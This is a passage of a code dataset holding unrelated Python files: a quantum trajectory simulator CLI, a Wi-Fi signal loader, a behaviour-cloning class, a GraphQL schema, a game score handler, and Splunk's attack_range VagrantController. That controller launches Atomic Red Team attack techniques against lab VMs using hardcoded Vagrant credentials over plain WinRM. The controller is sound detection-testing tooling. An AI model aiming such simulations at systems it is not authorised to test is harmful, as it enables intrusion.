parser.add_argument(\"--seed\",\n dest='seed',\n help=\"Seed to set for the simulation.\",\n type=int,\n default=1)\n\n # Number of trajectories\n parser.add_argument(\"--ntraj\",\n dest='ntraj',\n help=\"number of trajectories, should be kept at 1 if run via slurm\",\n type=int,\n default=1)\n\n # Duration\n parser.add_argument(\"--duration\",\n dest='duration',\n help=\"Duration (iterations = duration / divided by delta_t)\",\n type=float,\n default=10)\n\n # Delta T\n parser.add_argument(\"--delta_t\",\n dest='deltat',\n help=\"Parameter delta_t\",\n type=float,\n default=2e-3)\n\n # How much to downsample results\n parser.add_argument(\"--downsample\",\n dest='downsample',\n help=\"How much to downsample results\",\n type=int,\n default=1)\n\n # Simulation method\n parser.add_argument(\"--sdeint_method_name\",\n dest='sdeint_method_name',\n help=\"Which simulation method to use from sdeint packge.\",\n type=str,\n default=\"\")\n\n ################################################################################\n # System-specific parameters\n ################################################################################\n\n # regime\n parser.add_argument(\"--regime\",\n dest='regime',\n help=\"Type of system or regime.\"\n \"Can be 'absorptive_bistable', 'kerr_bistable', or 'kerr_qubit'\",\n type=str,\n default='absorptive_bistable')\n\n # num_systems\n parser.add_argument(\"--num_systems\",\n dest='num_systems',\n help=\"Number of system in the network. Can currently be 1 or 2\",\n type=int,\n default=1)\n\n # Nfock_a\n parser.add_argument(\"--Nfock_a\",\n dest='nfocka',\n help=\"Number of fock states in each cavity\",\n type=int,\n default=50)\n\n # Nfock_j\n parser.add_argument(\"--Nfock_j\",\n dest='nfockj',\n help=\"Dimensionality of atom states\"\n \"Used only if using a Jaynes-Cummings model\",\n type=int,\n default=2)\n\n ################################################################################\n # Parameters that apply only for the two-system case\n ################################################################################\n\n # R\n parser.add_argument(\"--R\",\n dest='R',\n help=\"Reflectivity of the beamsplitter in the two-system case.\",\n type=float,\n default=0.)\n\n # eps\n parser.add_argument(\"--eps\",\n dest='eps',\n help=\"Amplification of the classical signal when using partially classical transmission.\",\n type=float,\n default=0.)\n\n # noise_amp\n parser.add_argument(\"--noise_amp\",\n dest='noise_amp',\n help=\"Artificial amplification of the measurement-feedback noise.\"\n \"This is a non-physical term that is useful for understanding the effects of noise.\",\n type=float,\n default=1.)\n\n # trans_phase\n parser.add_argument(\"--trans_phase\",\n dest='trans_phase',\n help=\"Additional phase term added between the two systems.\",\n type=float,\n default=1.)\n\n # drive_second_system\n parser.add_argument(\"--drive_second_system\",\n dest='drive_second_system',\n help=\"Whether the second system is independently driven.\",\n type=bool,\n default=False)\n\n ################################################################################\n # Output Variables\n ################################################################################\n\n\n # Does the user want to quiet output?\n parser.add_argument(\"--quiet\",\n dest='quiet',\n action=\"store_true\",\n help=\"Turn off logging (debug and info)\",\n default=False)\n\n # Specify output directory\n parser.add_argument(\"--output_dir\",\n dest='outdir',\n type=str,\n help=\"Output folder. 
If not defined, results are placed in the current working directory.\",\n                        default=None)\n\n    # Save to pickle?\n    parser.add_argument(\"--save2pkl\",\n                        dest='save2pkl',\n                        action=\"store_true\",\n                        help=\"Save pickle file to --output_dir\",\n                        default=False)\n\n    # Save to mat?\n    parser.add_argument(\"--save2mat\",\n                        dest='save2mat',\n                        action=\"store_true\",\n                        help=\"Save .mat file to --output_dir\",\n                        default=False)\n    return parser\n\n\ndef main():\n    parser = get_parser()\n    try:\n        args = parser.parse_args()\n    except:\n        sys.exit(0)\n\n    # Set up commands from parser\n    params = dict()\n    ntraj = params['Ntraj'] = args.ntraj\n    seed = params['seed'] = args.seed\n    duration = params['duration'] = args.duration\n    delta_t = params['delta_t'] = args.deltat\n    Nfock_a = params['Nfock_a'] = args.nfocka\n    Nfock_j = params['Nfock_j'] = args.nfockj\n    downsample = params['downsample'] = args.downsample\n    Regime = params['regime'] = args.regime\n    num_systems = params['num_systems'] = args.num_systems\n    drive_second_system = params['drive_second_system'] = args.drive_second_system\n\n    if args.sdeint_method_name == \"\":\n        logging.info(\"sdeint_method_name not set. Using itoEuler as a default.\")\n        sdeint_method_name = params['sdeint_method_name'] = \"itoEuler\"\n    else:\n        sdeint_method_name = params['sdeint_method_name'] = args.sdeint_method_name\n\n    R = params['R'] = args.R\n    eps = params['eps'] = args.eps\n    noise_amp = params['noise_amp'] = args.noise_amp\n    trans_phase = params['trans_phase'] = args.trans_phase\n\n    # Does the user want to print verbose output?\n    quiet = args.quiet\n\n    if not quiet:\n        print_params(params=params)\n\n    # How much to downsample results\n    logging.info(\"Downsample set to %s\", downsample)\n\n    ## Names of files and output\n    if args.outdir is None:\n        outdir = os.getcwd()\n    else:\n        outdir = args.outdir\n\n    try:\n        os.stat(outdir)\n    except:\n        os.mkdir(outdir)\n\n    param_str = (\"%s-\"*14)[:-1] %(seed,\n                                  ntraj,\n                                  delta_t,\n                                  Nfock_a,\n                                  Nfock_j,\n                                  duration,\n                                  downsample,\n                                  sdeint_method_name,\n                                  num_systems,\n                                  R,\n                                  eps,\n                                  noise_amp,\n                                  trans_phase,\n                                  drive_second_system)\n    file_name = '%s/QSD_%s_%s' %(outdir,Regime,param_str)\n\n    # Saving options\n    save_mat = args.save2mat\n    save_pkl = args.save2pkl\n\n    if save_mat == False and save_pkl == False:\n        logging.warning(\"Both pickle and mat save are disabled, no data will be saved.\")\n        logging.warning(\"You can modify this with args --save2pkl and --save2mat\")\n\n    implicit_type = None\n\n    if sdeint_method_name in SDEINT_METHODS:\n        sdeint_method = SDEINT_METHODS[sdeint_method_name]\n\n        ## For now let's use the full implicit method for implicit methods.\n        ## The value implicit_type can be made one of:\n        ## \"implicit\", \"semi_implicit_drift\", or \"semi_implicit_diffusion\".\n        if sdeint_method_name in IMPLICIT_METHODS:\n            implicit_type = \"implicit\"\n    else:\n        logging.error(\"Unknown sdeint_method_name, %s, or not implemented yet.\", sdeint_method_name)\n        raise ValueError(\"Unknown sdeint_method_name, or not implemented yet.\")\n\n    tspan = np.arange(0,duration,delta_t)\n\n    obsq_data = None\n    if num_systems == 1:\n\n        if Regime == \"absorptive_bistable\":\n            logging.info(\"Regime is set to %s\", Regime)\n            H, psi0, Ls, obsq_data, obs_names = make_system_JC(Nfock_a, Nfock_j)\n        elif Regime == \"kerr_bistable\":\n            logging.info(\"Regime is set to %s\", Regime)\n            H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable(Nfock_a)\n        elif Regime == \"kerr_bistable2\":\n            logging.info(\"Regime is set to %s\", Regime)\n            H, psi0, Ls, obsq_data, obs_names = 
make_system_kerr_bistable_regime2(Nfock_a)\n elif Regime == \"kerr_bistable3\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime3(Nfock_a)\n elif Regime == \"kerr_bistable4\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime4(Nfock_a)\n elif Regime == \"kerr_bistable5\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime5(Nfock_a)\n elif Regime == \"kerr_bistable6\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime6(Nfock_a)\n elif Regime == \"kerr_bistable7\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime7(Nfock_a)\n elif Regime[:len(\"kerr_bistable\")] == \"kerr_bistable\": ##inputs in this case are e.g. kerr_bistableA33.25_...\n which_kerr = Regime[len(\"kerr_bistable\")] ## e.g. A in kerr_bistableA33.25_\n custom_drive = float(Regime[len(\"kerr_bistableA\"):]) ## e.g. 33.25 in kerr_bistableA33.25\n logging.info(\"Regime is set to %s, with custom drive %s\" %(Regime, custom_drive))\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime_chose_drive(Nfock_a, which_kerr, custom_drive)\n elif Regime == \"kerr_qubit\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_qubit(Nfock_a)\n else:\n logging.error(\"Unknown regime, %s, or not implemented yet.\", Regime)\n raise ValueError(\"Unknown regime, or not implemented yet.\")\n\n ### Run simulation for one system\n D = qsd_solve(H=H,\n psi0=psi0,\n tspan=tspan,\n Ls=Ls,\n sdeint_method=sdeint_method,\n obsq = obsq_data,\n ntraj = ntraj,\n seed = seed,\n normalize_state=True,\n downsample=downsample,\n implicit_type=implicit_type,\n )\n elif num_systems == 2:\n\n if Regime == \"absorptive_bistable\":\n logging.info(\"Regime is set to %s\", Regime)\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_JC_two_systems(Nfock_a, Nfock_j, drive_second_system)\n elif Regime == \"kerr_bistable\":\n logging.info(\"Regime is set to %s\", Regime)\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_kerr_bistable_two_systems(Nfock_a, drive_second_system)\n elif Regime == \"kerr_qubit\":\n logging.info(\"Regime is set to %s\", Regime)\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_kerr_qubit_two_systems(Nfock_a, drive_second_system)\n elif Regime[:len(\"empty_then_kerr\")] == 'empty_then_kerr': ##e.g. empty_then_kerrA33.25\n which_kerr = Regime[len(\"empty_then_kerr\")] ## e.g. A in empty_then_kerrA33.25_\n custom_drive = float(Regime[len(\"empty_then_kerrA\"):]) ## e.g. 33.25 in empty_then_kerrA33.25\n logging.info(\"Regime is set to %s, with custom drive %s\" %(Regime, custom_drive))\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_empty_then_kerr(Nfock_a, which_kerr, custom_drive)\n elif Regime[:len(\"kerr_bistable\")] == \"kerr_bistable\": ##inputs in this case are e.g. kerr_bistableA33.25_...\n which_kerr = Regime[len(\"kerr_bistable\")] ## e.g. A in kerr_bistableA33.25_\n custom_drive = float(Regime[len(\"kerr_bistableA\"):]) ## e.g. 
33.25 in kerr_bistableA33.25\n            logging.info(\"Regime is set to %s, with custom drive %s\" %(Regime, custom_drive))\n            H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_kerr_bistable_regime_chose_drive_two_systems(Nfock_a, which_kerr, custom_drive)\n\n        else:\n            logging.error(\"Unknown regime, %s, or not implemented yet.\", Regime)\n            raise ValueError(\"Unknown regime, or not implemented yet.\")\n\n        ### Run simulation for two systems\n        D = qsd_solve_two_systems(H1,\n                                  H2,\n                                  psi0,\n                                  tspan,\n                                  L1s,\n                                  L2s,\n                                  R=R,\n                                  eps=eps,\n                                  n=noise_amp,\n                                  sdeint_method=sdeint_method,\n                                  trans_phase=trans_phase,\n                                  obsq=obsq_data,\n                                  normalize_state=True,\n                                  downsample=downsample,\n                                  ops_on_whole_space = False, ## assume the given operators only operate on their own subspace\n                                  multiprocessing = False, ## disable multiprocessing for now\n                                  ntraj=ntraj,\n                                  seed=seed,\n                                  implicit_type = implicit_type,\n                                  )\n    else:\n        logging.error(\"Unknown num_systems, %s, or not implemented yet.\", num_systems)\n        raise ValueError(\"Unknown num_systems, or not implemented yet.\")\n\n    ### include time in results\n    D.update({'tspan':tspan})\n\n    ### downsample\n    D_downsampled = {'psis' : D['psis'],\n                     'obsq_expects' : D['obsq_expects'],\n                     'seeds' : D['seeds'],\n                     'tspan' : D['tspan'][::downsample] }\n\n    ### Save results\n    if save_mat:\n        logging.info(\"Saving mat file...\")\n        save2mat(data=D_downsampled,\n                 file_name=file_name,\n                 obs=obs_names,\n                 params=params)\n    if save_pkl:\n        logging.info(\"Saving pickle file...\")\n        save2pkl(data=D_downsampled,\n                 file_name=file_name,\n                 obs=obs_names,\n                 params=params)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"tabakg/quantum_state_diffusion","sub_path":"make_quantum_trajectory.py","file_name":"make_quantum_trajectory.py","file_ext":"py","file_size_in_byte":18025,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"17231406024","text":"import json\n\n# define the format of the info\ndata = '{\"mac\": \"XX:YY:ZZ:XX:YY:ZZ\", \"cellnumber\": \"XX\", \"signal_total\": \"XX\", \"signal_quality\": \"XX\", \"encryption\": \"XXXX\", \"signal_level_dBm\": \"XXX\", \"essid\": \"XXX\"}'\n\n# parse the JSON string\nparsed_json = (json.loads(data))\n\n# printing to check\n# print(json.dumps(parsed_json, indent=4, sort_keys=True))\n\n# distance between cellphone and notebook\ndistance = [\"1m\", \"5m\", \"10m\", \"20m\", \"30m\"]\n\n\n# array to receive the reads\nsignal_level = []\n\n# iterating in all directories\nfor dist in distance:\n    # read the directory with the json files\n    for x in range(1, 100):\n\n        # opening the files and saving the information in a string\n        with open(\"./reads2/\" + dist + \"/read_\" + str(x) + \".json\", 'r') as f:\n            info = json.load(f)\n\n        # iterating to get the signal's strength\n        for resp in info:\n            if (resp[\"essid\"] == \"PhoneArtifact11\"):\n                # print (resp['signal_level_dBm'])\n                signal_level.append(resp['signal_level_dBm'])\n\n    # printing information\n    # print (signal_level)\n\n    # save information in a file to access later\n    file = \"./results2/\" + dist + \".txt\"\n\n    with open(file, 'w') as f:\n        for item in signal_level:\n            f.write(\"%s\\n\" % item)\n    \n    # cleaning the array to be empty in the next iteration of distance\n    signal_level = []","repo_name":"leviresende/iwlist","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"72645265972","text":"from 
cs285.algorithms.algorithm import Algorithm\nimport tensorflow as tf\n\n\nclass BehaviorCloning(Algorithm):\n\n def __init__(\n self,\n policy,\n policy_optimizer_class=tf.keras.optimizers.Adam,\n policy_optimizer_kwargs=None,\n **kwargs,\n ):\n # train a policy using behavior cloning on expert samplers\n Algorithm.__init__(self, **kwargs)\n self.policy = policy\n\n # build an optimizer for the policy\n if policy_optimizer_kwargs is None:\n policy_optimizer_kwargs = dict(lr=0.0001, clipnorm=1.0)\n self.policy_optimizer = policy_optimizer_class(\n **policy_optimizer_kwargs)\n\n def update_algorithm(\n self,\n observations,\n actions,\n rewards,\n next_observations,\n terminals\n ):\n # update the policy with behavior cloning\n with tf.GradientTape() as tape:\n\n # compute the log probability of expert actions\n log_prob = self.policy.log_prob(actions, observations)\n self.record(\"log_prob\", tf.reduce_mean(log_prob))\n\n # build the cross entropy loss\n policy_loss = -tf.reduce_mean(log_prob)\n self.record(\"policy_loss\", policy_loss)\n\n # back prop gradients to maximize log prob of expert actions\n policy_gradients = tape.gradient(\n policy_loss, self.policy.trainable_variables)\n self.policy_optimizer.apply_gradients(zip(\n policy_gradients, self.policy.trainable_variables))\n","repo_name":"brandontrabucco/cs285","sub_path":"cs285/algorithms/imitate/behavior_cloning.py","file_name":"behavior_cloning.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1784767060","text":"\nfrom jinja2 import Environment, FileSystemLoader\nimport vagrant\nfrom tabulate import tabulate\nimport re\nimport ansible_runner\nimport sys\nimport os\nimport yaml\nfrom modules import splunk_sdk\n\n\nclass VagrantController():\n\n\n def __init__(self, config, log):\n self.config = config\n self.log = log\n\n if self.config['install_es'] == '1':\n self.config['splunk_es_app_version'] = re.findall(r'\\d+', self.config['splunk_es_app'])[0]\n\n self.vagrantfile = 'Vagrant.configure(\"2\") do |config| \\n \\n'\n\n if config['phantom_server'] == '1':\n self.vagrantfile += self.read_vagrant_file('phantom-server/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['splunk_server'] == '1':\n self.vagrantfile += self.read_vagrant_file('splunk_server/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['splunk_server'] == '0':\n self.vagrantfile += self.read_vagrant_file('caldera-server/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['windows_domain_controller'] == '1':\n self.vagrantfile += self.read_vagrant_file('windows-domain-controller/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['windows_client'] == '1':\n self.vagrantfile += self.read_vagrant_file('windows10/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['windows_server'] == '1':\n self.vagrantfile += self.read_vagrant_file('windows-server/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['kali_machine'] == '1':\n self.vagrantfile += self.read_vagrant_file('kali-machine/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n self.vagrantfile += '\\nend'\n with open('vagrant/Vagrantfile', 'w') as file:\n file.write(self.vagrantfile)\n\n\n def read_vagrant_file(self, path):\n j2_env = Environment(loader=FileSystemLoader('vagrant'),trim_blocks=True)\n template = j2_env.get_template(path)\n vagrant_file = template.render(self.config)\n return vagrant_file\n\n\n def build(self):\n self.log.info(\"[action] > build\\n\")\n v1 = 
vagrant.Vagrant('vagrant/', quiet_stdout=False, quiet_stderr=False)\n        try:\n            v1.up(provision=True, provider=\"virtualbox\")\n        except:\n            self.log.error(\"vagrant failed to build\")\n            sys.exit(1)\n\n        self.log.info(\"attack_range has been built using vagrant successfully\")\n        self.list_machines()\n\n\n    def destroy(self):\n        self.log.info(\"[action] > destroy\\n\")\n        v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n        v1.destroy()\n        self.log.info(\"attack_range has been destroyed using vagrant successfully\")\n\n\n    def stop(self):\n        print(\"[action] > stop\\n\")\n        v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n        v1.halt()\n\n\n    def resume(self):\n        print(\"[action] > resume\\n\")\n        v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n        v1.up()\n\n\n    def simulate(self, target, simulation_techniques, simulation_atomics):\n\n        # if specific atomics are given, multiple techniques are not allowed\n        techniques_arr = simulation_techniques.split(',')\n        if (len(techniques_arr) > 1) and (simulation_atomics != 'no'):\n            self.log.error('ERROR: if simulation_atomics are used, only a single simulation_technique is allowed.')\n            sys.exit(1)\n\n        run_specific_atomic_tests = 'True'\n        if simulation_atomics == 'no':\n            run_specific_atomic_tests = 'False'\n\n        # get ip address from machine\n        self.check_targets_running_vagrant(target, self.log)\n        target_ip = self.get_ip_address_from_machine(target)\n        runner = ansible_runner.run(private_data_dir='.',\n                                    cmdline=str('-i ' + target_ip + ', '),\n                                    roles_path=\"ansible/roles\",\n                                    playbook='ansible/atomic_red_team.yml',\n                                    extravars={'art_branch': self.config['art_branch'], 'art_repository': self.config['art_repository'], 'run_specific_atomic_tests': run_specific_atomic_tests, 'art_run_tests': simulation_atomics, 'art_run_techniques': simulation_techniques, 'ansible_user': 'Vagrant', 'ansible_password': 'vagrant', 'ansible_port': 5985, 'ansible_winrm_scheme': 'http'},\n                                    verbosity=0)\n\n        if runner.status == \"successful\":\n            self.log.info(\"successfully executed technique ID {0} against target: {1}\".format(simulation_techniques, target))\n        else:\n            self.log.error(\"failed to execute technique ID {0} against target: {1}\".format(simulation_techniques, target))\n            sys.exit(1)\n\n\n    def get_ip_address_from_machine(self, box):\n        pattern = 'config.vm.define \"' + box + '\"[\\s\\S]*?:private_network, ip: \"([^\"]+)'\n        match = re.search(pattern, self.vagrantfile)\n        return match.group(1)\n\n\n    def check_targets_running_vagrant(self, target, log):\n        v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n        status = v1.status()\n\n        found_box = False\n        for stat in status:\n            if stat.name == target:\n                found_box = True\n                if not (stat.state == 'running'):\n                    log.error(target + ' not running.')\n                    sys.exit(1)\n                break\n        if not found_box:\n            log.error(target + ' not found as vagrant box.')\n            sys.exit(1)\n\n\n    def list_machines(self):\n        print()\n        print('Vagrant Status\\n')\n        v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n        response = v1.status()\n        status = []\n        for stat in response:\n            status.append([stat.name, stat.state, self.get_ip_address_from_machine(stat.name)])\n\n        print(tabulate(status, headers=['Name','Status','IP Address']))\n        print()\n\n    def dump(self, dump_name):\n        self.log.info(\"Dump log data\")\n\n        folder = \"attack_data/\" + dump_name\n        os.mkdir(os.path.join(os.path.dirname(__file__), '../' + folder))\n\n\n        with open(os.path.join(os.path.dirname(__file__), '../attack_data/dumps.yml')) as dumps:\n            for dump in yaml.full_load(dumps):\n                if dump['enabled']:\n                    dump_out = 
dump['dump_parameters']['out']\n                    dump_search = \"search %s earliest=%s | sort 0 _time\" \\\n                                  % (dump['dump_parameters']['search'], dump['dump_parameters']['time'])\n                    dump_info = \"Dumping Splunk Search to %s \" % dump_out\n                    self.log.info(dump_info)\n                    out = open(os.path.join(os.path.dirname(__file__), \"../attack_data/\" + dump_name + \"/\" + dump_out), 'wb')\n                    splunk_sdk.export_search(self.config['splunk_server_private_ip'],\n                                             s=dump_search,\n                                             password=self.config['splunk_admin_password'],\n                                             out=out)\n                    out.close()\n                    self.log.info(\"%s [Completed]\" % dump_info)\n","repo_name":"splunk/attack_range_local","sub_path":"modules/VagrantController.py","file_name":"VagrantController.py","file_ext":"py","file_size_in_byte":7196,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"21"}
{"seq_id":"34077864670","text":"#! /usr/bin/env python\n\n'''decorator demo'''\nfrom time import time\n\noption = {\n    'pre' : 'pre_logged',\n    'post' : 'post_logged'\n}\n\ndef logged(when):\n    def log(f, *args, **kargs):\n        print('''Called:\n        function: %s\n        args: %r\n        kargs: %r\n        ''' % (f, args, kargs))\n\n    def pre_logged(f):\n        def wrapper(*args, **kargs):\n            log(f, *args, **kargs)\n            return f(*args, **kargs)\n        return wrapper\n\n    def post_logged(f):\n        def wrapper(*args, **kargs):\n            now = time()\n            try:\n                return f(*args, **kargs)\n            finally:\n                log(f, *args)\n                print('time delta: %s' % (time()-now))\n        return wrapper\n\n    try:\n        choice = option[when]\n    except KeyError as e:\n        raise ValueError(e)\n\n    if choice == 'pre_logged':\n        return eval(choice)\n    elif choice == 'post_logged':\n        # look up the local function by name; it must be returned, not called here\n        return vars()[choice]\n        # return eval(choice)\n\n\n\n@logged('post')\ndef hello(name):\n    print('hello, %s' % name)\n\nhello('world!')","repo_name":"sadscv/core_programming","sub_path":"core_programming/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"26262747467","text":"from types import NoneType\n\nfrom typing import List, Optional\n\nimport strawberry\nimport strawberry_django\nfrom strawberry.django import auth\n\nfrom .permissions import AdminPermission\nfrom .resolvers import (\n    resolve_current_user,\n    tag_anchor_mutation,\n    tag_mutation,\n    tutorial_anchor_mutation,\n    tutorial_mutation,\n    graph_anchor_mutation,\n    graph_mutation,\n    graph_description_mutation,\n    code_mutation,\n    register_mutation,\n)\nfrom .resolvers.queries import (\n    resolve_tutorial_anchors,\n    resolve_graph_anchors,\n    get_tutorial_content,\n    get_graph,\n    get_graph_content,\n    get_code,\n)\nfrom ..executor_runner import handle_executor_request\nfrom ..executor_runner.types import ResponseType\n\nfrom ..models import Code\nfrom ..types import (\n    UserType,\n    TagAnchorType,\n    TutorialType,\n    TutorialAnchorType,\n    GraphAnchorType,\n    GraphType,\n    GraphDescriptionType,\n    TagType,\n    CodeType,\n)\n\nfrom ..types.filters import (\n    TagAnchorFilter,\n)\n\n__all__ = [\"schema\"]\n\n\n@strawberry.type\nclass Query:\n    me: Optional[UserType] = strawberry.field(resolver=resolve_current_user)\n    tag_anchors: List[TagAnchorType] = strawberry_django.field(filters=TagAnchorFilter)\n    tutorial_anchors: List[TutorialAnchorType] = strawberry_django.field(\n        resolve_tutorial_anchors\n    )\n    graph_anchors: List[GraphAnchorType] = strawberry_django.field(\n        resolve_graph_anchors\n    )\n    tutorial_content: Optional[TutorialType] = strawberry_django.field(\n        get_tutorial_content\n    )\n    graph_content: 
Optional[GraphDescriptionType] = strawberry_django.field(\n get_graph_content\n )\n graph: Optional[GraphType] = strawberry_django.field(get_graph)\n code: Optional[Code] = strawberry_django.field(get_code)\n\n\n@strawberry.type\nclass Mutation:\n login: Optional[UserType] = auth.login()\n logout: NoneType = auth.logout()\n register: Optional[UserType] = strawberry.mutation(resolver=register_mutation)\n mutate_tag_anchor: Optional[TagAnchorType] = strawberry.mutation(\n resolver=tag_anchor_mutation\n )\n mutate_tag: Optional[TagType] = strawberry.mutation(resolver=tag_mutation)\n mutate_tutorial_anchor: Optional[TutorialAnchorType] = strawberry.mutation(\n resolver=tutorial_anchor_mutation\n )\n mutate_tutorial: Optional[TutorialType] = strawberry.mutation(\n resolver=tutorial_mutation\n )\n mutate_graph_anchor: Optional[GraphAnchorType] = strawberry.mutation(\n resolver=graph_anchor_mutation\n )\n mutate_graph: Optional[GraphType] = strawberry.mutation(resolver=graph_mutation)\n mutate_graph_description: Optional[GraphDescriptionType] = strawberry.mutation(\n resolver=graph_description_mutation\n )\n mutate_code: Optional[CodeType] = strawberry.mutation(resolver=code_mutation)\n execution_request: ResponseType = strawberry.mutation(\n resolver=handle_executor_request\n )\n\n\nschema = strawberry.Schema(query=Query, mutation=Mutation)\n","repo_name":"Reed-CompBio/GrapheryV2-Django","sub_path":"graphery/backend/schema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5906449534","text":"import webapp2\nimport logging\nimport datetime\nfrom handlers.base_handler import BaseHandler\nfrom webapp2_extras import json\nfrom models.familyMember import *\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\nfrom util.memcacheHelper import safeMemcacheSet\nfrom util.template import jinja_environment\nfrom models.games import BrickBreakerTopScore\nimport json\n\nclass GamesPageHandler(BaseHandler):\n def get(self):\n template= jinja_environment.get_template('games.html')\n self.response.out.write(template.render({}))\n\nclass BrickBreakerPageHandler(BaseHandler):\n def get(self):\n template_values= get_top_5_scores()\n template= jinja_environment.get_template('brick_breaker.html')\n self.response.out.write(template.render(template_values))\n \nclass BrickBreakerHighScoresHandler(BaseHandler):\n def post(self):\n score = int(self.request.get(\"score\"))\n name = self.request.get(\"name\")\n sort_score(score,name)\n \n self.response.out.write(json.dumps(get_top_5_scores()))\n \nclass BrickBreakerInitHandler(BaseHandler):\n def get(self):\n top_score_1 = BrickBreakerTopScore(key_name=\"High_Score_DB_1\",score=0, name=\"None\")\n top_score_1.put()\n top_score_2 = BrickBreakerTopScore(key_name=\"High_Score_DB_2\",score=0, name=\"None\")\n top_score_2.put()\n top_score_3 = BrickBreakerTopScore(key_name=\"High_Score_DB_3\",score=0, name=\"None\")\n top_score_3.put()\n top_score_4 = BrickBreakerTopScore(key_name=\"High_Score_DB_4\",score=0, name=\"None\")\n top_score_4.put()\n top_score_5 = BrickBreakerTopScore(key_name=\"High_Score_DB_5\",score=0, name=\"None\")\n top_score_5.put()\n \ndef sort_score(score,name):\n score,name = swap_out_top_score_1(score,name)\n score,name = swap_out_top_score_2(score,name)\n score,name = swap_out_top_score_3(score,name)\n score,name = swap_out_top_score_4(score,name)\n score,name = 
swap_out_top_score_5(score,name)\n \ndef swap_out_top_score_1(score,name):\n top_score_1_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_1\")\n if (score >= top_score_1_db.score):\n temp_score = top_score_1_db.score\n temp_name = top_score_1_db.name\n top_score_1_db.score = score\n top_score_1_db.name = name\n top_score_1_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef swap_out_top_score_2(score,name):\n top_score_2_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_2\")\n if (score >= top_score_2_db.score):\n temp_score = top_score_2_db.score\n temp_name = top_score_2_db.name\n top_score_2_db.score = score\n top_score_2_db.name = name\n top_score_2_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef swap_out_top_score_3(score,name):\n top_score_3_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_3\")\n if (score >= top_score_3_db.score):\n temp_score = top_score_3_db.score\n temp_name = top_score_3_db.name\n top_score_3_db.score = score\n top_score_3_db.name = name\n top_score_3_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef swap_out_top_score_4(score,name):\n top_score_4_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_4\")\n if (score >= top_score_4_db.score):\n temp_score = top_score_4_db.score\n temp_name = top_score_4_db.name\n top_score_4_db.score = score\n top_score_4_db.name = name\n top_score_4_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef swap_out_top_score_5(score,name):\n top_score_5_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_5\")\n if (score >= top_score_5_db.score):\n temp_score = top_score_5_db.score\n temp_name = top_score_5_db.name\n top_score_5_db.score = score\n top_score_5_db.name = name\n top_score_5_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef get_top_5_scores():\n BBDB_1 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_1\")\n BBDB_2 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_2\")\n BBDB_3 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_3\")\n BBDB_4 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_4\")\n BBDB_5 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_5\")\n template_values = {\n \"top_score_1_DB\": {\n \"score\": BBDB_1.score,\n \"name\": BBDB_1.name\n },\n \"top_score_2_DB\": {\n \"score\": BBDB_2.score,\n \"name\": BBDB_2.name\n },\n \"top_score_3_DB\": {\n \"score\": BBDB_3.score,\n \"name\":BBDB_3.name\n },\n \"top_score_4_DB\": {\n \"score\": BBDB_4.score,\n \"name\": BBDB_4.name\n },\n \"top_score_5_DB\": {\n \"score\": BBDB_5.score,\n \"name\": BBDB_5.name\n }\n }\n return 